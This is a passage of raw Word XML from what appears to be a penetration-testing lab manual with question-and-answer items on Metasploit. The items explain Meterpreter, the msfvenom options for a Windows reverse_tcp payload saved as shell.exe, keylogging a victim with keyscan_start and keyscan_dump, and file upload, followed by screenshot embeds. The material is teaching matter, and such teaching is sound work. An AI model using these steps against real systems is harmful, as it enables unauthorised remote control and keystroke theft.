                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Metepreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FD3BA4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C5E6E3" w14:textId="7FA68DFD" w:rsidR="000655C7" w:rsidRDefault="00E43B05" w:rsidP="00E43B05">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E43B05">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Meterpreter is a post-exploitation tool that is used as a payload to gain control of a victim's computer and execute commands on the compromised system. It is a powerful and flexible tool used by penetration testers and hackers to perform various tasks such as remote access, file system manipulation, privilege escalation, and data theft.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B44AB94" w14:textId="77777777" w:rsidR="00E43B05" w:rsidRPr="00E43B05" w:rsidRDefault="00E43B05" w:rsidP="00E43B05">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2EAEF8CB" w14:textId="77777777" w:rsidR="002670F4" w:rsidRPr="002670F4" w:rsidRDefault="002670F4" w:rsidP="002670F4">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002670F4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Explain the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002670F4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002670F4">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> commands required to generate payload.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060B16C3" w14:textId="77777777" w:rsidR="005A5E90"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Explanation of the command:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C4AC036" w14:textId="77777777" w:rsidR="005A5E90"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p: specifies the payload to use, in this case, windows/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005A5E90">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005A5E90">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005A5E90">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005A5E90">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ABC8A32" w14:textId="77777777" w:rsidR="005A5E90"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LHOST: specifies the IP address of the attacker's machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0E6AF2" w14:textId="77777777" w:rsidR="005A5E90"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LPORT: specifies the port number to listen on for incoming connections from the target machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A298408" w14:textId="77777777" w:rsidR="005A5E90"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f: specifies the output format of the payload, in this case, exe.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4470BAC6" w14:textId="15BAF0A3" w:rsidR="00E43B05" w:rsidRPr="005A5E90" w:rsidRDefault="005A5E90" w:rsidP="005A5E90">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5E90">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>&gt; shell.exe: redirects the output to a file named shell.exe.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67CD14C5" w14:textId="77777777" w:rsidR="005A5E90" w:rsidRDefault="005A5E90" w:rsidP="005A5E90">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23D3250C" w14:textId="77777777" w:rsidR="005D56E5" w:rsidRPr="005D56E5" w:rsidRDefault="005D56E5" w:rsidP="005D56E5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D56E5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Write the command to start key scanner on victim’s machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="764102D1" w14:textId="77777777" w:rsidR="005D56E5" w:rsidRPr="00D42DDB" w:rsidRDefault="005D56E5" w:rsidP="005D56E5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D42DDB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>keyscan_start</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6BDB5756" w14:textId="77777777" w:rsidR="00D42DDB" w:rsidRDefault="00D42DDB" w:rsidP="00D42DDB">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3715F460" w14:textId="3E5206CA" w:rsidR="005D56E5" w:rsidRPr="005D56E5" w:rsidRDefault="005D56E5" w:rsidP="005D56E5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D56E5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">What is the output of following command - </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D56E5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>keyscan_dump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D56E5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="604CE8CE" w14:textId="77777777" w:rsidR="005D56E5" w:rsidRPr="00D42DDB" w:rsidRDefault="005D56E5" w:rsidP="00C9539B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D42DDB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>It Will print the logged keys onscreen</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="018C1030" w14:textId="77777777" w:rsidR="005D56E5" w:rsidRPr="005D56E5" w:rsidRDefault="005D56E5" w:rsidP="005D56E5">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D56E5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Write the command to upload a file in window’s F drive after getting </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D56E5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>meterpreter</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D56E5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FE1735E" w14:textId="7555C3BF" w:rsidR="00841062" w:rsidRPr="001C411D" w:rsidRDefault="005D56E5" w:rsidP="00D42DDB">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D42DDB">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>upload command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0356487C" w14:textId="560095FB" w:rsidR="00BE1412" w:rsidRPr="001C411D" w:rsidRDefault="00BE1412" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F86953F" w14:textId="191894A4" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0B09B4" w14:textId="45802C16" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61281ED5" w14:textId="77777777" w:rsidR="00EF04B3" w:rsidRPr="001C411D" w:rsidRDefault="00EF04B3" w:rsidP="00A90352">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40928744" w14:textId="77777777" w:rsidR="00232E7E" w:rsidRDefault="00232E7E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1865B6" w14:textId="1BF27C2D" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A9035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7202FEA9" w14:textId="77777777"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750226B7" w14:textId="3C5F51B5" w:rsidR="002D5E7E" w:rsidRDefault="003446D6" w:rsidP="0055189E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13A4EB45" wp14:editId="2E62D6E0">
            <wp:extent cx="5943600" cy="3184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A582C93" w14:textId="66811D02" w:rsidR="003446D6" w:rsidRDefault="003446D6" w:rsidP="0055189E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2614273C" wp14:editId="7BD0AF1D">
            <wp:extent cx="5943600" cy="3184525"/>
            <wp:effectExtent l="0" t="0" r="0"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5FD8A82" w14:textId="77777777" w:rsidR="00F3066C" w:rsidRDefault="00F3066C" w:rsidP="0055189E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C386A2" w14:textId="77777777" w:rsidR="00A435DE" w:rsidRDefault="00A435DE" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2875DFE6" w14:textId="2D420782" w:rsidR="001F212D" w:rsidRDefault="003446D6" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="265DDE74" wp14:editId="0356EB66">
            <wp:extent cx="5943600" cy="3184525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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3A043281" w14:textId="57AC7BA0" w:rsidR="003446D6" w:rsidRDefault="003446D6" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EDA60CB" wp14:editId="42FF8D31">
            <wp:extent cx="5943600" cy="3184525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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BFB2AAB" w14:textId="1DA0C57A" w:rsidR="003446D6" w:rsidRDefault="003446D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC4ADC4" w14:textId="741E9EB1" w:rsidR="003446D6" w:rsidRDefault="003446D6" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="046396AF" wp14:editId="1BC98FE2">
            <wp:extent cx="5943600" cy="3184525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="176" name="Picture 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medium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3642699C" w14:textId="21ADE104" w:rsidR="003446D6" w:rsidRDefault="003446D6" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05343EEA" wp14:editId="76D5F760">
            <wp:extent cx="5943600" cy="3184525"/>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144808D8" w14:textId="2A8804A9" w:rsidR="003446D6" w:rsidRDefault="003446D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F279818" w14:textId="332A4A47" w:rsidR="003446D6" w:rsidRDefault="003446D6" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B279FE" w14:textId="6ED0A253" w:rsidR="003446D6" w:rsidRDefault="003446D6" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F265B64" wp14:editId="7554529B">
            <wp:extent cx="5943600" cy="318452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48A3402" w14:textId="4F61F101" w:rsidR="003446D6" w:rsidRDefault="003446D6" w:rsidP="00A90352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="023F90D3" wp14:editId="51B6CFE5">
            <wp:extent cx="5943600" cy="3184525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181" name="Picture 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7AE0A12" w14:textId="4AC54C0D" w:rsidR="003C49B3" w:rsidRDefault="003C49B3" w:rsidP="003C49B3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E035DB3" wp14:editId="05EB6910">
            <wp:extent cx="5227327" cy="3983603"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124223379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3798" name="Picture 1" descr="A computer screen capture&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId161"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5230299" cy="3985868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
